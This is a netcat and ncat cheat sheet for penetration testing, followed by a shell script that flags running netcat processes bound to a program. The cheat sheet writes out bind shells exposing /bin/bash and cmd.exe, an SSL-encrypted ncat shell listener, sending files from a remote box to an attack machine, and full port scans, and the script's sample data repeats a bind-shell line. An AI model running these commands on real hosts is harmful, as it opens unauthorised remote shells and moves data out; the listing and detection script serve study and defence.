Shells and Files

Stage a verbose listener on the attack machine

nc -nvlp <Port>

Connect from the remote box back to the attack machine

nc <IP> <Port>

Receive a file on the attack box

nc -l -p <Port> > out.file

Send a file from the box

nc -w 3 <IP> <Port> < out.file

Set up a bind shell on the box

nc -v -e '/bin/bash' -l -p <Port> -t

nc -l -p <Port> -e "c:\windows\system32\cmd.exe"

Then telnet or nc to port <Port> from the attack system to get the shell.

Network Utilities

Using netcat to make an HTTP request

echo -e "GET / HTTP/1.0\n\n" | nc -w 5 <IP> 80

Making a one-page webserver; this will feed homepage.txt to all comers.

cat homepage.txt | nc -v -l -p 80

Check a UDP port

nc -vu <IP> <Port>

Scan UDP ports

nc -vzu <IP> 1-65535

To scan TCP ports, simply remove the -u

nc -vz <IP> 1-65535

Make an SSL-encrypted shell listener (on Windows bind to cmd.exe, on Linux to /bin/sh); --allow limits which host may connect

ncat --exec cmd.exe --allow <IP> -vnl 4444 --ssl

Connect to the SSL-encrypted shell listener

ncat -v <IP> 4444 --ssl
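
Added example (not part of the original cheat sheet): a triage check for the exec-bound listeners shown in the bind shell and ncat entries above. It reads a process listing and reports every nc/ncat/netcat process started with -e, --exec or --sh-exec, noting whether it uses --ssl and --allow. The input format (PID followed by the command line, as printed by ps -eo pid=,args=), the function names and the sample lines are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example: flag netcat processes that hand a program to the network.
# Assumed input: one process per line, "PID COMMAND ARGS...",
# for instance the output of: ps -eo pid=,args=

flag_nc_exec() {
  awk '
  {
    n = split($2, path, "/"); prog = path[n]      # basename of the command
    if (prog != "nc" && prog != "ncat" && prog != "netcat") next
    exec_opt = 0; ssl = 0; allow = 0
    for (i = 3; i <= NF; i++) {
      if ($i == "--exec" || $i == "--sh-exec") exec_opt = 1
      else if ($i == "--ssl")   ssl = 1
      else if ($i == "--allow") allow = 1
      # Short-option cluster: -e takes an argument, so it is always last.
      else if ($i ~ /^-[A-Za-z0-9]+$/ && $i ~ /e$/) exec_opt = 1
    }
    if (exec_opt)
      print $1, (ssl ? "ssl" : "plaintext"), (allow ? "allow-listed" : "any-source")
  }'
}

# Constructed sample listing (192.0.2.10 is a documentation address).
sample_ps() {
  cat <<'EOF'
101 nc -v -e /bin/bash -l -p 4444 -t
102 nc -l -p 9001
103 /usr/bin/ncat --exec /bin/sh --allow 192.0.2.10 -vnl 4444 --ssl
104 nc -w 3 192.0.2.10 9001
105 grep -e nc /var/log/syslog
EOF
}

# Stand-alone run: prints one line per exec-bound netcat process.
sample_ps | flag_nc_exec
```

On a live host, feed it with ps -eo pid=,args= | flag_nc_exec; a "plaintext any-source" result is a shell that anyone who can reach the port may use.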